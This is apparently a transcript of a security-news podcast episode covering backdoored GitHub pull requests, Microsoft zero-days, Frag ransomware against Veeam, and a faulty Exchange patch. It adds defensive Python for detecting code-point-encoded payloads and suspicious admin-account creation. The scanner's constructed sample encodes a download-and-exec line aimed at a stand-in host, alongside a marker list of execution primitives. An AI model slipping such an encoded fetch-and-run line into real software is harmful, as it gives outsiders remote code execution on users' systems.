This episode of Cyber Security Today is brought to you by CDW Canada Tech Talks. If you’re passionate about technology and innovation, this is the podcast for you.
Join host KJ Burke, as he and industry experts dive into the latest trends, insights, and strategies shaping the tech landscape in Canada. Visit cdw.ca/tech talks to tune in today. There’s a link in the show notes.
GitHub Projects Targeted with Malicious Commits in Smear Campaign Against Researcher, Microsoft Confirms Four Zero-Days in November Patch Tuesday: Windows Users Must Update Now, New Ransomware Targets Veeam Backup Software, and Microsoft Exchange Update Fixes Security Flaws but Disrupts Mail Transport Rules
This is Cyber Security Today. I’m your host, Jim Love.
GitHub Projects Targeted with Malicious Commits in Smear Campaign Against Researcher
Multiple GitHub projects have been targeted with malicious commits and pull requests that appear intended to inject backdoors into open-source repositories. The campaign came to light when EXO Labs, an AI and machine learning startup, flagged an “innocent-looking” pull request that attempted to compromise its codebase.
The pull request modified a Python file, embedding a long list of integers. Read as Unicode code points and converted back to characters, the list formed a script that would download and execute a remote payload from “evildojo[.]com.” Had it been merged, the code would have given whoever controlled that domain remote code execution on every system running the project. However, the URL never hosted any content, which suggests the goal was something other than a straightforward compromise.
The pull request originated from the now-deleted GitHub account “evildojo666,” which impersonated Texas-based security researcher Mike Bell. Bell has denied involvement, stating, “There was never any payload…this is a smear campaign.” A second impersonator account, “darkimage666,” has also been linked to similar malicious activity. Both accounts have since been removed.
The evidence suggests a coordinated effort to frame Bell: anyone can create a GitHub account using another person’s name and details and submit pull requests under it, and the absence of a payload at the linked URL further supports the theory that this was a reputation attack rather than a supply-chain compromise.
This wasn’t an isolated incident. At least 18 similar pull requests were identified across open-source projects, including “yt-dlp,” a popular video downloader. Many accounts linked to these attacks have been traced to Indonesia-based actors, according to threat intelligence reports.
The malicious commits were caught early by vigilant maintainers and by automated tooling such as Presubmit’s AI Reviewer, which flagged the EXO Labs pull request with a “critical security” alert. Such reviewers, which run as GitHub Actions on every pull request, are becoming an important layer of defence for open-source supply chains.
While the attack was thwarted, it underscores the supply-chain risk in open-source software: a single merged pull request can ship a backdoor to every downstream user. It also highlights how easily impersonation can occur in online ecosystems, leaving individuals and projects exposed to both reputational and security risks.
This incident follows other high-profile attacks on open-source projects, demonstrating the ongoing need for robust code review processes and vigilance against malicious activity.
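The obfuscation described above (a list of integers that the surrounding code decodes as Unicode code points and runs) is cheap to detect before merge. The scanner below is an added example, not code from EXO Labs, Presubmit or any project named in the story: it parses a Python file, finds long integer-literal lists, decodes them and flags any that decode to readable text containing download-and-execute primitives. All sample inputs are constructed, and the decoy URL uses the reserved name example.invalid.

```python
"""
Pre-merge scanner for code-point-encoded payloads in Python source.

Added example, not project code. It looks for the pattern described in the
story: a long list of integer literals that, read as Unicode code points,
decodes into a script containing fetch-and-run primitives. Samples are constructed.
"""
import ast

MIN_RUN = 16  # shorter integer lists are common (lookup tables, test vectors)
# Substrings that, in decoded text, point at download-and-execute behaviour.
MARKERS = (
    "exec(", "eval(", "__import__", "urlopen", "urllib", "requests.",
    "subprocess", "os.system", "os.popen", "socket.", "base64",
    "http://", "https://",
)


def decode_int_sequence(node):
    """If `node` is a list/tuple of >= MIN_RUN valid code points that decode
    to mostly printable text, return that text; otherwise return None."""
    if not isinstance(node, (ast.List, ast.Tuple)) or len(node.elts) < MIN_RUN:
        return None
    chars = []
    for elt in node.elts:
        ok = (isinstance(elt, ast.Constant) and isinstance(elt.value, int)
              and not isinstance(elt.value, bool) and 0 <= elt.value < 0x110000)
        if not ok:
            return None
        chars.append(chr(elt.value))
    text = "".join(chars)
    printable = sum(c.isprintable() or c in "\n\t" for c in text)
    if printable < 0.9 * len(text):
        return None  # a genuine lookup table rarely decodes to readable text
    return text


def scan_source(source):
    """Return one finding per integer sequence in `source` that decodes to text.
    Severity is "critical" when the decoded text contains a MARKER, otherwise
    "review" (readable text hidden in integers still deserves a human look)."""
    findings = []
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return findings  # unparseable input should be treated as its own signal
    for node in ast.walk(tree):
        text = decode_int_sequence(node)
        if text is None:
            continue
        hits = [m for m in MARKERS if m in text]
        findings.append({
            "line": node.lineno,
            "severity": "critical" if hits else "review",
            "markers": hits,
            "decoded": text[:120],
        })
    return findings


# --- constructed samples ----------------------------------------------------
BENIGN = "def greet(name):\n    return 'Hello, ' + name\n"

# Twenty small ints that decode to control characters: a legitimate table.
LOOKUP_TABLE = "TABLE = [%s]\n" % ", ".join(str(i) for i in range(20))

# Constructed decoy script; example.invalid is reserved and never resolves.
# It is encoded the way the story describes: a list of code points that the
# surrounding code decodes and executes.
_DECOY = ("import urllib.request as u;"
          "exec(u.urlopen('http://example.invalid/x').read())")
_TEMPLATE = "def helper():\n    _d = %r\n    exec(''.join(chr(c) for c in _d))\n"
SUSPICIOUS = _TEMPLATE % [ord(c) for c in _DECOY]

if __name__ == "__main__":
    for name, src in (("benign", BENIGN), ("table", LOOKUP_TABLE),
                      ("suspicious", SUSPICIOUS)):
        print(name, scan_source(src))
```

Wired into a pull-request workflow, this kind of check runs over every changed `.py` file and fails the job on a critical finding. It only catches literal integer lists; an attacker can split the sequence across several assignments, hide it in a string of digits, or use bytes and `base64`, so treat it as one signal among several and keep the human review that caught the EXO Labs request in the loop.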
Microsoft Confirms Four Zero-Days in November Patch Tuesday: Windows Users Must Update Now
Microsoft’s November Patch Tuesday release addresses more than 90 security issues, including four publicly disclosed zero-days, two of which are being actively exploited. The vulnerabilities span multiple Microsoft products, including Windows, Office, and Exchange Server. Immediate updates are recommended.
Actively Exploited Zero-Days:
- CVE-2024-43451: NTLM Hash Disclosure Spoofing
This vulnerability discloses a user’s NT LAN Manager (NTLM) authentication hash to an attacker, who can relay or crack it to authenticate as that user. Exploitation requires only minimal user interaction with a malicious file delivered, for example, via phishing; selecting or right-clicking the file can be enough, without opening it.
- CVE-2024-49039: Windows Task Scheduler Elevation of Privilege
An attacker who can already run a specially crafted application on the target, even from a low-privilege AppContainer sandbox, can use this flaw to escalate to medium integrity and call Remote Procedure Call (RPC) functions normally restricted to privileged accounts. Exploitation therefore requires prior access to the system and the ability to execute code on it.
Critical-Rated Vulnerabilities:
Two additional vulnerabilities, neither yet known to be exploited, scored 9.8 out of 10 on the Common Vulnerability Scoring System (CVSS):
- CVE-2024-43498: A .NET and Visual Studio remote code execution flaw. An unauthenticated remote attacker can exploit it by sending crafted requests to a vulnerable .NET web application, or by getting a vulnerable desktop application to load a malicious file.
- CVE-2024-43639: A Windows Kerberos remote code execution flaw. An unauthenticated attacker can use a specially crafted application to leverage a weakness in a cryptographic protocol and execute code on the target, with no user interaction required.
“These vulnerabilities indicate high impact,” Tyler Reguly, a security expert at Fortra, warned. Exploitation could lead to significant system compromise, making prompt updates essential.
Affected Products:
The vulnerabilities impact:
- Windows 10, Windows 11 and Windows Server
- Microsoft Office
- Exchange Server
- .NET
- Visual Studio
- SQL Server
What to Do:
Security experts emphasize that updating Windows systems and Microsoft software immediately is the best defence, starting with the two actively exploited flaws. “Patch now to resolve both known and exploited vulnerabilities,” said Chris Goettl, VP of Security Product Management at Ivanti. Organizations running Exchange Server should also prioritize updates to protect critical infrastructure.
New Ransomware Variant Exploits Critical Veeam Backup Vulnerability
A critical vulnerability in Veeam Backup & Replication software, with a CVSS score of 9.8, is being actively exploited by a new ransomware variant called Frag, according to a report from Sophos X-Ops. This is the latest in a series of attacks on the same flaw, following earlier campaigns by the Akira and Fog ransomware groups.
Attackers gain initial access through a compromised VPN appliance, then exploit the Veeam vulnerability to reach the backup server. From there they create new administrator accounts to establish persistence; in recent incidents those accounts were named “point” and “point2.”
Frag employs tactics, techniques, and procedures (TTPs) consistent with Akira and Fog ransomware groups, indicating a possible overlap or shared playbook among these operators.
The flaw, still unpatched in some environments, gives attackers broad control over the backup infrastructure, making data exfiltration and ransomware deployment straightforward.
Growing Risk:
The continued exploitation of this Veeam vulnerability highlights the increasing danger for organizations relying on unpatched or outdated backup systems. Ransomware groups are intensifying their efforts, and the proliferation of similar TTPs suggests the vulnerability remains a high-value target.
Experts are recommending:
- Patch Immediately: Ensure Veeam Backup & Replication is updated with the latest security patches.
- Audit Access: Review VPN and remote-access configurations, and the membership of local and domain administrator groups, for unauthorized accounts such as “point” or “point2.”
- Monitor for Threat Indicators: Watch for signs of compromise, including account-creation and group-membership-change events on backup servers, suspicious admin account activity, or unusual file access.
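The persistence step described above (a fresh local account created by the attacker and then promoted to a privileged group) leaves a tight pair of events in the Windows Security log: 4720 (user account created) followed by 4732 (member added to a security-enabled local group). The correlation below is an added example, not Sophos code or a Veeam feature; the events are constructed to look like a SIEM export, and the account names, business-hours window and privileged-group list are assumptions for the example.

```python
"""
Correlate Security log events 4720 (account created) and 4732 (member added
to a security-enabled local group) to surface new accounts promoted to a
privileged group shortly after creation. Added example, not Sophos code;
all events below are constructed.
"""
from datetime import datetime, timedelta

KNOWN_IOC_NAMES = {"point", "point2"}  # account names reported in recent incidents
PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users", "Backup Operators"}
WINDOW = timedelta(minutes=30)  # creation-to-promotion gap worth flagging (assumption)
BUSINESS_HOURS = range(7, 19)   # assumption for the off-hours heuristic

# Constructed sample events (ISO timestamps, local time).
EVENTS = [
    {"time": "2024-11-10T02:14:03", "id": 4720, "subject": "VEEAM-SVC", "target": "point", "group": None},
    {"time": "2024-11-10T02:14:09", "id": 4732, "subject": "VEEAM-SVC", "target": "point", "group": "Administrators"},
    {"time": "2024-11-10T02:15:41", "id": 4720, "subject": "VEEAM-SVC", "target": "point2", "group": None},
    {"time": "2024-11-10T02:15:50", "id": 4732, "subject": "VEEAM-SVC", "target": "point2", "group": "Administrators"},
    {"time": "2024-11-11T09:30:00", "id": 4720, "subject": "jdoe-admin", "target": "svc-reports", "group": None},
    {"time": "2024-11-11T09:30:30", "id": 4732, "subject": "jdoe-admin", "target": "svc-reports", "group": "Backup Operators"},
    {"time": "2024-11-11T10:00:00", "id": 4720, "subject": "jdoe-admin", "target": "intern03", "group": None},
    {"time": "2024-11-11T10:00:20", "id": 4732, "subject": "jdoe-admin", "target": "intern03", "group": "Users"},
]


def find_suspicious_promotions(events, window=WINDOW):
    """Return alerts for accounts added to a privileged group within `window`
    of their creation, highest severity first. Severity is "high" when a
    second indicator (known IOC name or off-hours creation) is also present."""
    created = {}  # target account -> most recent 4720 event
    alerts = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        if e["id"] == 4720:
            created[e["target"]] = e
            continue
        if e["id"] != 4732 or e["group"] not in PRIVILEGED_GROUPS:
            continue
        c = created.get(e["target"])
        if c is None:
            continue  # pre-existing account promoted: a different, noisier rule
        gap = datetime.fromisoformat(e["time"]) - datetime.fromisoformat(c["time"])
        if gap > window:
            continue
        reasons = [f"created and added to {e['group']} within {int(gap.total_seconds())}s"]
        if e["target"].lower() in KNOWN_IOC_NAMES:
            reasons.append("name matches a reported Frag account name")
        if datetime.fromisoformat(c["time"]).hour not in BUSINESS_HOURS:
            reasons.append("created outside business hours")
        alerts.append({
            "account": e["target"],
            "created_by": c["subject"],
            "time": e["time"],
            "severity": "high" if len(reasons) > 1 else "medium",
            "reasons": reasons,
        })
    return sorted(alerts, key=lambda a: (a["severity"] != "high", a["time"]))


if __name__ == "__main__":
    for a in find_suspicious_promotions(EVENTS):
        print(a["severity"].upper(), a["account"], "by", a["created_by"],
              "-", "; ".join(a["reasons"]))
```

On a live host the raw events come from `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4720,4732}` or from the SIEM that already collects them. The names “point” and “point2” are a weak indicator because the next operator will pick different ones; the durable signal is the timing correlation, especially when the creating subject is the backup application’s own service account, which is exactly what exploitation of the Veeam server would look like.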
Microsoft Exchange Update Fixes Security Flaws, Disrupts Mail Transport Rules
And as much as everyone recommends prompt patching, Microsoft has paused the rollout of its November 2024 Exchange Server security update after discovering that it breaks transport rules, a feature critical to email compliance and mail flow. The update, which addresses vulnerabilities in Exchange Server, caused problems in hybrid and on-premises deployments and left some organizations with interrupted email delivery.
The update led to periodic failures of transport rules and Data Loss Prevention (DLP) policies for some customers. In the worst cases, mail flow stopped altogether. Organizations that use neither transport nor DLP rules appear unaffected and can keep the update installed.
Transport rules (mail flow rules) inspect messages in transit, enforce compliance policies, and handle exceptions before delivery. They are widely used for tasks such as inspecting attachments or adding disclaimers to outgoing mail. The failures caused by the update left these functions unreliable or completely inoperative.
After customer complaints surfaced on social media and forums, Microsoft pulled the update on November 14. For affected users, the company recommends uninstalling the patch and waiting for a revised version.
While Microsoft acted quickly to pause the rollout, the incident raises questions about its testing processes. Exchange Server remains a key target for cyberattacks, and maintaining security through updates is critical. However, breaking a core function like mail flow risks significant disruption for businesses.
But in a world where early patching is a necessity, not a luxury, it’s hard to blame organizations for hesitating when patches break key parts of their systems and operations.
And that’s our show for today.
Thanks to our sponsor, CDW, and KJ Burke’s CDW Canada Tech Talks. Check it out if you get the chance. You can find it, like us, on Spotify, Apple or wherever you get your podcasts.
Reach me at editorial@technewsday.ca
I’m your host Jim Love, thanks for listening.